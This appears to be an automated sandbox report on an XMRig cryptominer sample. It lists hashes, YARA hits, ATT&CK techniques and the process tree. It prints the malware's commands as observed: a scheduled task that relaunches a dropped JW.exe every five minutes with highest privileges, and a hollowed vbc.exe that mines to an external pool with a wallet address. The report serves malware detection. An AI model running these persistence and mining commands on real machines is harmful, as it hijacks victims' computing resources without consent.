xmrig | 0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

General

Target

0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe
Size

833KB
MD5

e94daf09612a7fa6491ff9ff47cd8cae
SHA1

fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014
SHA256

0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37
SHA512

4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a
SSDEEP

6144:o2j7MpEXhM4uccEV0SvafIxRT3ChsYwSZpji1X+i22Usn3tezndwI/VLuwUUblRB:X5ucdV0LoSf2+VI3EhHPZR7F

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1952-71-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-73-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-75-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-76-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-78-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-80-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-81-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-83-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-85-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-86-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1952-88-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-90-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1952-92-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

JW.exe

pid process

2036 JW.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1228 cmd.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

JW.exe

description pid process target process

PID 2036 set thread context of 1952 2036 JW.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1420 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2024 timeout.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

JW.exe

pid process

2036 JW.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
2036	JW.exe

pid	process
1228	cmd.exe

description	pid	process	target process
PID 2036 set thread context of 1952	2036	JW.exe	vbc.exe

pid	process
1420	schtasks.exe

pid	process
2024	timeout.exe

pid	process
2036	JW.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exeJW.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	1676	0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe
Token: SeDebugPrivilege	2036	JW.exe
Token: SeLockMemoryPrivilege	1952	vbc.exe
Token: SeLockMemoryPrivilege	1952	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1952 vbc.exe

pid	process
1952	vbc.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.execmd.exeJW.execmd.exe

description	pid	process	target process
PID 1676 wrote to memory of 1228	1676	0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe	cmd.exe
PID 1676 wrote to memory of 1228	1676	0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe	cmd.exe
PID 1676 wrote to memory of 1228	1676	0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe	cmd.exe
PID 1228 wrote to memory of 2024	1228	cmd.exe	timeout.exe
PID 1228 wrote to memory of 2024	1228	cmd.exe	timeout.exe
PID 1228 wrote to memory of 2024	1228	cmd.exe	timeout.exe
PID 1228 wrote to memory of 2036	1228	cmd.exe	JW.exe
PID 1228 wrote to memory of 2036	1228	cmd.exe	JW.exe
PID 1228 wrote to memory of 2036	1228	cmd.exe	JW.exe
PID 2036 wrote to memory of 1700	2036	JW.exe	cmd.exe
PID 2036 wrote to memory of 1700	2036	JW.exe	cmd.exe
PID 2036 wrote to memory of 1700	2036	JW.exe	cmd.exe
PID 1700 wrote to memory of 1420	1700	cmd.exe	schtasks.exe
PID 1700 wrote to memory of 1420	1700	cmd.exe	schtasks.exe
PID 1700 wrote to memory of 1420	1700	cmd.exe	schtasks.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe
PID 2036 wrote to memory of 1952	2036	JW.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe
"C:\Users\Admin\AppData\Local\Temp\0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpF355.tmp.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1228

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:2024

C:\ProgramData\system32\JW.exe
"C:\ProgramData\system32\JW.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JW" /tr "C:\ProgramData\system32\JW.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JW" /tr "C:\ProgramData\system32\JW.exe"
5⤵
- Creates scheduled task(s)
PID:1420

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 47UkNrHRk4agJcyuYKGhvY4UPDJPELWo3T99w2bjnPGzSrhqXr9fwr6UwxKNSmVuc68LF1yhcqUqoSnCZBwK6WE9Lokat8v -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1952

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\system32\JW.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
C:\ProgramData\system32\JW.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF355.tmp.bat
Filesize
139B

MD5
f1663b697ab2652d13816a33da9cfa91

SHA1
90e89cea73344eea7b630f279044b57a0506001b

SHA256
b2a99d9f5e3be7914e096fbb0eda09bd67b99dc61010f17d4321dc04831e2d63

SHA512
661cb7b1b1f80fe69a12812f52abba7cf8dcd30294a897f03278df7068bd55e2097efbdca278fb49eae3b6666630f585613a268dd9b4c2f9ce348b9fe3ba9894

Download Submit
\ProgramData\system32\JW.exe
Filesize
833KB

MD5
e94daf09612a7fa6491ff9ff47cd8cae

SHA1
fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

SHA256
0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

SHA512
4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

Download Submit
memory/1228-55-0x0000000000000000-mapping.dmp

Download
memory/1420-65-0x0000000000000000-mapping.dmp

Download
memory/1676-54-0x0000000000240000-0x0000000000314000-memory.dmp

Filesize
848KB

Download
memory/1700-64-0x0000000000000000-mapping.dmp

Download
memory/1952-69-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-86-0x0000000140343234-mapping.dmp

Download
memory/1952-92-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-91-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1952-66-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-67-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-90-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-71-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-73-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-75-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-76-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-78-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-80-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-81-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-83-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-85-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1952-89-0x0000000000300000-0x0000000000320000-memory.dmp

Filesize
128KB

Download
memory/1952-88-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2024-57-0x0000000000000000-mapping.dmp

Download
memory/2036-63-0x000007FEFC101000-0x000007FEFC103000-memory.dmp

Filesize
8KB

Download
memory/2036-62-0x0000000001080000-0x0000000001154000-memory.dmp

Filesize
848KB

Download
memory/2036-59-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads